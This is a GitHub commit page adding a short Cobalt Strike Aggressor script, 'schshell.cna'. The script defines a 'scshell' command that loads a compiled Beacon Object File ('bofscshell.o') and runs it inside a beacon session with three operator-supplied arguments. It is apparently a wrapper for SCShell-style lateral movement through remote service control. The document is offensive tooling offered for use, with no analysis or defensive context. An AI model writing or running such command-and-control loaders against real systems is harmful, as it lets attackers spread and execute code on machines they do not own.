Skip to content

Commit 3467739

Browse files
authored
Create schshell.cna
1 parent 9bfdf2d commit 3467739

File tree

1 file changed

+11
-0
lines changed

1 file changed

+11
-0
lines changed

CS-BOF/schshell.cna

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
alias scshell {
2+
local('$handle $data $args');
3+
4+
$handle = openf(script_resource("bofscshell.o"));
5+
$data = readb($handle, -1);
6+
closef($handle);
7+
8+
$args = bof_pack($1, "zzz", $2, $3, $4);
9+
btask($1, "Running BOF SCShell");
10+
beacon_inline_execute($1, $data, "go", $args);
11+
}

0 commit comments

Comments
 (0)